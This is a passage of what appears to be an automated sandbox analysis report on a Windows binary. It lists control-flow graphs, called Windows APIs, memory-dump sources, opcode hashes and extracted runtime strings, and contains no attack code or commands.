7ff79e9499e9-7ff79e9499fd GetLastError 1539->1566 1567 7ff79e949aff-7ff79e949b06 1539->1567 1548 7ff79e94978a-7ff79e9497be 1540->1548 1549 7ff79e949760-7ff79e949763 1540->1549 1541->1535 1542 7ff79e9497d6-7ff79e9497dc 1541->1542 1552 7ff79e9498da-7ff79e9498ee 1542->1552 1553 7ff79e9497e2-7ff79e9497ed 1542->1553 1551 7ff79e949831-7ff79e949872 1545->1551 1555 7ff79e949be0 1545->1555 1556 7ff79e949766-7ff79e949771 1546->1556 1550 7ff79e9497c0 1548->1550 1548->1551 1549->1556 1550->1555 1564 7ff79e94989e 1551->1564 1565 7ff79e949874-7ff79e949881 1551->1565 1560 7ff79e94992f-7ff79e949942 1552->1560 1561 7ff79e9498f0-7ff79e9498ff 1552->1561 1553->1549 1563 7ff79e9497f3 1553->1563 1568 7ff79e949be2-7ff79e949beb call 7ff79e97a450 1555->1568 1556->1532 1558->1537 1562 7ff79e949c55-7ff79e949c58 CloseHandle 1558->1562 1559->1558 1560->1549 1575 7ff79e949948 1560->1575 1571 7ff79e94994d-7ff79e949962 1561->1571 1572 7ff79e949901-7ff79e949927 1561->1572 1562->1537 1563->1548 1576 7ff79e9498a0-7ff79e9498c2 call 7ff79e916e30 1564->1576 1565->1576 1577 7ff79e949a03-7ff79e949a06 1566->1577 1578 7ff79e949a8f-7ff79e949aa9 1566->1578 1573 7ff79e949b1c-7ff79e949b76 call 7ff79e943750 1567->1573 1574 7ff79e949b08-7ff79e949b17 call 7ff79e8f3e10 1567->1574 1568->1533 1571->1540 1583 7ff79e949968-7ff79e94998f 1571->1583 1572->1540 1580 7ff79e94992d 1572->1580 1591 7ff79e949b7b-7ff79e949b7e 1573->1591 1574->1573 1575->1571 1603 7ff79e9498c8-7ff79e9498d5 1576->1603 1604 7ff79e949bd3-7ff79e949bde 1576->1604 1587 7ff79e949a08-7ff79e949a0f 1577->1587 1588 7ff79e949a20-7ff79e949a23 1577->1588 1584 7ff79e949aab-7ff79e949ab7 call 7ff79e8f3e10 1578->1584 1585 7ff79e949abc-7ff79e949abf 1578->1585 1580->1583 1583->1549 1592 7ff79e949995 1583->1592 1584->1585 1594 7ff79e949ad6-7ff79e949ada 1585->1594 1595 7ff79e949ac1-7ff79e949ad1 call 7ff79e8f3e10 1585->1595 1589 7ff79e949a2d-7ff79e949a32 1587->1589 1588->1578 1590 7ff79e949a25-7ff79e949a2b 1588->1590 1589->1503 1597 7ff79e949a38-7ff79e949a4b call 7ff79e8f3e10 1589->1597 1590->1578 1590->1589 1598 7ff79e949b9d-7ff79e949bb3 1591->1598 1599 7ff79e949b80-7ff79e949b92 1591->1599 1592->1548 1601 7ff79e949adc-7ff79e949adf CloseHandle 1594->1601 1602 7ff79e949ae4-7ff79e949afe 1594->1602 1595->1594 1597->1503 1598->1602 1607 7ff79e949bb9-7ff79e949bce call 7ff79e8f3e10 1598->1607 1599->1595 1606 7ff79e949b98 1599->1606 1601->1602 1603->1556 1604->1568 1606->1594 1607->1602
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentPrng
                                                                                                        • String ID:
                                                                                                        • API String ID: 716580790-0
                                                                                                        • Opcode ID: e7a94183ad9eb618ef574ac7b421061d8cad92e0e364971ef1802b6e13f3e5b0
                                                                                                        • Instruction ID: f0b212ae6fbb166f4a5b2d57055dd6e68de1b9bb2277a807be50a8f398e8f12f
                                                                                                        • Opcode Fuzzy Hash: e7a94183ad9eb618ef574ac7b421061d8cad92e0e364971ef1802b6e13f3e5b0
                                                                                                        • Instruction Fuzzy Hash: 3B02E272A08BA289EB64AF7AD4903B967A0FB047A8F804635DE5D477C5EE7CD540C321
                                                                                                        Function 00007FF79E947000 Relevance: 3.1, APIs: 2, Instructions: 75filenativesynchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileObjectSingleWaitWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1507886151-0
                                                                                                        • Opcode ID: f90c94bbde2d15f5dd49e45bc93b021f94ca7a944ecab33971cf0177bd17e77b
                                                                                                        • Instruction ID: b07c9d9da3f4b964ce5bd68e8679a367c2dbb9e3e5607e9542e47a67eeed4d3c
                                                                                                        • Opcode Fuzzy Hash: f90c94bbde2d15f5dd49e45bc93b021f94ca7a944ecab33971cf0177bd17e77b
                                                                                                        • Instruction Fuzzy Hash: 7A31B232B04B9599FB20DB74E8907ED73A5EB543A8F944130EA4D43B84EF3CD1948361
                                                                                                        Function 00007FF79E942E70 Relevance: .3, Instructions: 329COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6fad73bf66c27cc899b09c25f804392d73b3bdd7228d3588e32abe8b927a1c01
                                                                                                        • Instruction ID: 9c41987bb104a11c41d68b8351719ad50123c21f456fb20e0a95d60fa0b23701
                                                                                                        • Opcode Fuzzy Hash: 6fad73bf66c27cc899b09c25f804392d73b3bdd7228d3588e32abe8b927a1c01
                                                                                                        • Instruction Fuzzy Hash: 76C13762A1866281FB35DB35949037EE7A1BF157A4F805631DE5E026D2EE3CE5818332
                                                                                                        Function 00007FF79E93C410 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 276synchronizationCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1067 7ff79e93c410-7ff79e93c45b call 7ff79e94b630 1070 7ff79e93c649-7ff79e93c650 1067->1070 1071 7ff79e93c461-7ff79e93c490 1067->1071 1074 7ff79e93c681-7ff79e93c697 1070->1074 1072 7ff79e93c497-7ff79e93c4eb 1071->1072 1073 7ff79e93c492 CloseHandle 1071->1073 1075 7ff79e93c4ed-7ff79e93c4f0 1072->1075 1076 7ff79e93c545-7ff79e93c548 1072->1076 1073->1072 1077 7ff79e93c4f2-7ff79e93c500 call 7ff79e94a490 1075->1077 1078 7ff79e93c56f-7ff79e93c589 call 7ff79e94a0b0 1075->1078 1079 7ff79e93c54a-7ff79e93c564 call 7ff79e94a0b0 1076->1079 1080 7ff79e93c597-7ff79e93c5a6 WaitForSingleObject 1076->1080 1087 7ff79e93c505-7ff79e93c508 1077->1087 1092 7ff79e93c6cc-7ff79e93c6f9 call 7ff79e9877f0 1078->1092 1093 7ff79e93c58f 1078->1093 1099 7ff79e93c56a-7ff79e93c56d 1079->1099 1100 7ff79e93c698-7ff79e93c6ca call 7ff79e9877f0 1079->1100 1083 7ff79e93c5a8-7ff79e93c5b7 GetLastError 1080->1083 1084 7ff79e93c5ed-7ff79e93c601 call 7ff79e99cb0c 1080->1084 1088 7ff79e93c5b9-7ff79e93c5c3 call 7ff79e8f3e10 1083->1088 1089 7ff79e93c5c8-7ff79e93c5d3 1083->1089 1098 7ff79e93c606-7ff79e93c608 1084->1098 1087->1080 1094 7ff79e93c50e-7ff79e93c540 call 7ff79e9877f0 1087->1094 1088->1089 1096 7ff79e93c5d5-7ff79e93c5df call 7ff79e8f3e10 1089->1096 1097 7ff79e93c5e4-7ff79e93c5eb 1089->1097 1112 7ff79e93c6fe-7ff79e93c76f call 7ff79e907ef0 CloseHandle 1092->1112 1102 7ff79e93c592 CloseHandle 1093->1102 1094->1112 1096->1097 1107 7ff79e93c630-7ff79e93c644 CloseHandle * 2 1097->1107 1098->1083 1101 7ff79e93c60a-7ff79e93c62c 1098->1101 1099->1102 1100->1112 1101->1107 1102->1080 1108 7ff79e93c652-7ff79e93c67d 1107->1108 1109 7ff79e93c646 1107->1109 1108->1074 1109->1070 1117 7ff79e93c771-7ff79e93c77b call 7ff79e8f3e10 1112->1117 1118 7ff79e93c780-7ff79e93c787 1112->1118 1117->1118 1119 7ff79e93c789-7ff79e93c793 call 7ff79e8f3e10 1118->1119 1120 7ff79e93c798-7ff79e93c7fb call 7ff79e908790 CloseHandle * 2 call 7ff79e99d100 call 7ff79e94b630 1118->1120 1119->1120 1129 7ff79e93c7fd-7ff79e93c807 1120->1129 1130 7ff79e93c80c-7ff79e93c823 1120->1130 1131 7ff79e93c8a2-7ff79e93c8b5 1129->1131 1132 7ff79e93c82e-7ff79e93c83d WaitForSingleObject 1130->1132 1133 7ff79e93c825-7ff79e93c829 CloseHandle 1130->1133 1134 7ff79e93c857-7ff79e93c86c GetExitCodeProcess 1132->1134 1135 7ff79e93c83f-7ff79e93c855 GetLastError 1132->1135 1133->1132 1134->1135 1137 7ff79e93c86e-7ff79e93c874 1134->1137 1136 7ff79e93c876-7ff79e93c88b CloseHandle * 2 1135->1136 1138 7ff79e93c88d-7ff79e93c890 CloseHandle 1136->1138 1139 7ff79e93c895-7ff79e93c898 1136->1139 1137->1136 1138->1139 1139->1131 1140 7ff79e93c89a-7ff79e93c89d CloseHandle 1139->1140 1140->1131
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                                        • String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$called `Result::unwrap()` on an `Err` value
                                                                                                        • API String ID: 1454876536-677056220
                                                                                                        • Opcode ID: 151983278287afcaa18b04d4368c3b1f6f90e560c228511bda00a9cccee4120c
                                                                                                        • Instruction ID: 29b94e997d7f38978d48ba8a55779194da6a797f886215a7dd23d40cef291fd9
                                                                                                        • Opcode Fuzzy Hash: 151983278287afcaa18b04d4368c3b1f6f90e560c228511bda00a9cccee4120c
                                                                                                        • Instruction Fuzzy Hash: D3C15232A08A8299EB31EF71D8813EC67A0FB44798F945531EE4D46B99DF38E185C371
                                                                                                        Function 00007FF79E94A490 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1447 7ff79e94a490-7ff79e94a4c8 call 7ff79e94a7a0 1450 7ff79e94a4d7-7ff79e94a50a call 7ff79e94a7a0 1447->1450 1451 7ff79e94a4ca-7ff79e94a4d2 CloseHandle 1447->1451 1455 7ff79e94a6ec-7ff79e94a6f0 call 7ff79e9086c0 1450->1455 1456 7ff79e94a510-7ff79e94a54c 1450->1456 1452 7ff79e94a6f5-7ff79e94a707 1451->1452 1455->1452 1457 7ff79e94a550-7ff79e94a569 call 7ff79e99c8fc 1456->1457 1461 7ff79e94a56b-7ff79e94a56d 1457->1461 1462 7ff79e94a5c0-7ff79e94a5c7 1457->1462 1463 7ff79e94a573-7ff79e94a57a 1461->1463 1464 7ff79e94a675-7ff79e94a684 GetLastError 1461->1464 1465 7ff79e94a5c9-7ff79e94a5cc 1462->1465 1466 7ff79e94a615-7ff79e94a61b call 7ff79e94a880 1462->1466 1469 7ff79e94a580-7ff79e94a583 1463->1469 1470 7ff79e94a652-7ff79e94a658 call 7ff79e94a880 1463->1470 1467 7ff79e94a6e3-7ff79e94a6e7 call 7ff79e9086c0 1464->1467 1471 7ff79e94a5ce-7ff79e94a5d2 1465->1471 1472 7ff79e94a5d4-7ff79e94a5f3 GetOverlappedResult 1465->1472 1476 7ff79e94a620-7ff79e94a624 1466->1476 1467->1455 1478 7ff79e94a589-7ff79e94a5a8 GetOverlappedResult 1469->1478 1479 7ff79e94a635 1469->1479 1489 7ff79e94a65d-7ff79e94a661 1470->1489 1473 7ff79e94a5fc-7ff79e94a60f 1471->1473 1474 7ff79e94a5f9 1472->1474 1475 7ff79e94a686-7ff79e94a6b3 GetLastError 1472->1475 1473->1466 1483 7ff79e94a6d5 1473->1483 1474->1473 1481 7ff79e94a6c4-7ff79e94a6cd call 7ff79e907ef0 1475->1481 1482 7ff79e94a6b5-7ff79e94a6c2 1475->1482 1484 7ff79e94a626-7ff79e94a62a 1476->1484 1485 7ff79e94a66f-7ff79e94a673 1476->1485 1487 7ff79e94a5ae-7ff79e94a5b1 1478->1487 1488 7ff79e94a708-7ff79e94a735 GetLastError 1478->1488 1486 7ff79e94a639-7ff79e94a64c 1479->1486 1481->1483 1482->1467 1482->1481 1493 7ff79e94a6d8-7ff79e94a6e0 call 7ff79e94a9e0 1483->1493 1484->1457 1494 7ff79e94a630 1484->1494 1485->1467 1486->1470 1486->1493 1487->1486 1490 7ff79e94a737-7ff79e94a744 1488->1490 1491 7ff79e94a746-7ff79e94a757 call 7ff79e907ef0 1488->1491 1489->1485 1495 7ff79e94a663-7ff79e94a667 1489->1495 1490->1467 1490->1491 1491->1493 1493->1467 1494->1483 1495->1457 1499 7ff79e94a66d 1495->1499 1499->1493
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLastOverlappedResult
                                                                                                        • String ID:
                                                                                                        • API String ID: 3265865415-0
                                                                                                        • Opcode ID: a50b33477fc8709e44bd478fe8fa8da52814e5ff23f1461ff13e6d67c012ac94
                                                                                                        • Instruction ID: 5edd9884f46223ab4b0f060f0f5cff007673a6442d8ce64907d616b6441e8dca
                                                                                                        • Opcode Fuzzy Hash: a50b33477fc8709e44bd478fe8fa8da52814e5ff23f1461ff13e6d67c012ac94
                                                                                                        • Instruction Fuzzy Hash: CB713E22B09BA589FF20AB7588C03FD6760BB147A8F844535DE0C16B9AFF78E5518371
                                                                                                        Function 00007FF79E943750 Relevance: 7.7, APIs: 5, Instructions: 184fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1611 7ff79e943750-7ff79e94378e call 7ff79e951a40 1614 7ff79e94379a-7ff79e9437ca call 7ff79e953f30 1611->1614 1615 7ff79e943790-7ff79e943795 1611->1615 1619 7ff79e9437cc-7ff79e9437cf 1614->1619 1620 7ff79e9437d4-7ff79e9437e0 1614->1620 1616 7ff79e94393c-7ff79e94394b 1615->1616 1619->1616 1621 7ff79e9437ec-7ff79e9437ee 1620->1621 1622 7ff79e9437e2-7ff79e9437e4 1620->1622 1623 7ff79e9437f0-7ff79e9437f8 1621->1623 1625 7ff79e943835-7ff79e943839 1621->1625 1622->1623 1624 7ff79e9437e6-7ff79e9437ea 1622->1624 1626 7ff79e943849-7ff79e94384d 1623->1626 1627 7ff79e9437fa-7ff79e9437fc 1623->1627 1624->1626 1628 7ff79e9437fe-7ff79e94380b 1625->1628 1629 7ff79e94383b-7ff79e94383f 1625->1629 1632 7ff79e943882-7ff79e943884 1626->1632 1633 7ff79e94384f-7ff79e943851 1626->1633 1627->1626 1627->1628 1628->1616 1630 7ff79e943811-7ff79e943830 call 7ff79e8f3e10 1628->1630 1629->1628 1631 7ff79e943841-7ff79e943845 1629->1631 1630->1616 1631->1628 1637 7ff79e943847 1631->1637 1634 7ff79e94388a-7ff79e943893 1632->1634 1635 7ff79e94397b-7ff79e94398b 1632->1635 1633->1634 1638 7ff79e943853-7ff79e94385c 1633->1638 1639 7ff79e94385e-7ff79e943862 1634->1639 1640 7ff79e943895 1634->1640 1635->1640 1641 7ff79e943991 1635->1641 1637->1626 1638->1639 1638->1640 1643 7ff79e943968-7ff79e94396b 1639->1643 1644 7ff79e943868-7ff79e943880 1639->1644 1645 7ff79e943898-7ff79e9438d8 CreateFileW 1640->1645 1650 7ff79e943996-7ff79e9439b1 GetLastError call 7ff79e99cc24 1641->1650 1646 7ff79e94396d-7ff79e94396f 1643->1646 1647 7ff79e9439d4-7ff79e9439d6 1643->1647 1644->1645 1648 7ff79e9438da-7ff79e9438e1 1645->1648 1649 7ff79e94394c-7ff79e943964 GetLastError 1645->1649 1653 7ff79e9439dc-7ff79e9439e1 1646->1653 1654 7ff79e943971-7ff79e943976 1646->1654 1647->1628 1647->1653 1655 7ff79e943918-7ff79e94391d 1648->1655 1656 7ff79e9438e3-7ff79e9438e7 1648->1656 1651 7ff79e94391f-7ff79e943936 call 7ff79e8f3e10 1649->1651 1652 7ff79e943966 1649->1652 1663 7ff79e9439c7-7ff79e9439cf 1650->1663 1664 7ff79e9439b3-7ff79e9439c2 call 7ff79e8f3e10 1650->1664 1658 7ff79e943939 1651->1658 1652->1658 1653->1645 1654->1645 1655->1651 1655->1658 1656->1655 1659 7ff79e9438e9-7ff79e9438f3 GetLastError 1656->1659 1658->1616 1659->1655 1662 7ff79e9438f5-7ff79e943916 SetFileInformationByHandle 1659->1662 1662->1650 1662->1655 1663->1616 1664->1663
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$File$CreateHandleInformation
                                                                                                        • String ID:
                                                                                                        • API String ID: 1834474996-0
                                                                                                        • Opcode ID: c84c56a54cfdf0d408b82a2f913fc8c283fcddbfe834c57bec7729a3375b2019
                                                                                                        • Instruction ID: 54fd9ec42685f53e4336626abef8cf0d20c905d59d9f925683b5e8a8a35a3b2d
                                                                                                        • Opcode Fuzzy Hash: c84c56a54cfdf0d408b82a2f913fc8c283fcddbfe834c57bec7729a3375b2019
                                                                                                        • Instruction Fuzzy Hash: CD61B291E0C56285FB71E63184813BDABA0AF04BA4F944531CD8D17BCBEE3DD9458732
                                                                                                        Function 00007FF79E92BBF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF79E92BBF5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards
                                                                                                        • API String ID: 0-3387848338
                                                                                                        • Opcode ID: a7faa39673de56642cb76b5f5ec39d829f873236218a4591de7c32b63b683be0
                                                                                                        • Instruction ID: ee53e046f0a6c0da486863b9c795eb4d2900fd18febe8f409ade3364b28a8cb7
                                                                                                        • Opcode Fuzzy Hash: a7faa39673de56642cb76b5f5ec39d829f873236218a4591de7c32b63b683be0
                                                                                                        • Instruction Fuzzy Hash: CA311562F0968694FF25FB359A853B897A1AF447E8F984430DE0C07B85EE7CA14183B1
                                                                                                        Function 00007FF79E94A7A0 Relevance: 3.8, APIs: 3, Instructions: 67COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1798101686-0
                                                                                                        • Opcode ID: 366337b096fda4292be803d15bc9772c442e63c85a58f0050d74a9e0beb594fe
                                                                                                        • Instruction ID: ea9048593a3ecc260cd7b200a17d1082dc7c8a03cbf4e785a592d25fe1766d0c
                                                                                                        • Opcode Fuzzy Hash: 366337b096fda4292be803d15bc9772c442e63c85a58f0050d74a9e0beb594fe
                                                                                                        • Instruction Fuzzy Hash: E511D522A0574152F769BB22A980378A694EB887A0F484434DE8C07B81EF7CA4A28370
                                                                                                        Function 00007FF79E9272A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DescriptionThread
                                                                                                        • String ID: main
                                                                                                        • API String ID: 2285587249-3207122276
                                                                                                        • Opcode ID: ab7703ec82c3bf8afcebab53cce1798250a40d462dbe90b47f8c00be0dd91670
                                                                                                        • Instruction ID: d7039f547ce12a148d76b44b9d7f424212d4665b438dfe45121a7b9857788e4c
                                                                                                        • Opcode Fuzzy Hash: ab7703ec82c3bf8afcebab53cce1798250a40d462dbe90b47f8c00be0dd91670
                                                                                                        • Instruction Fuzzy Hash: 3C013C21B0461199EB20EB71EC852FD6764AB443A8FD00435DD0D57A59EF28E849C331
                                                                                                        Function 00007FF79E9086C0 Relevance: 2.5, APIs: 2, Instructions: 19COMMON
                                                                                                        Download Yara Rule

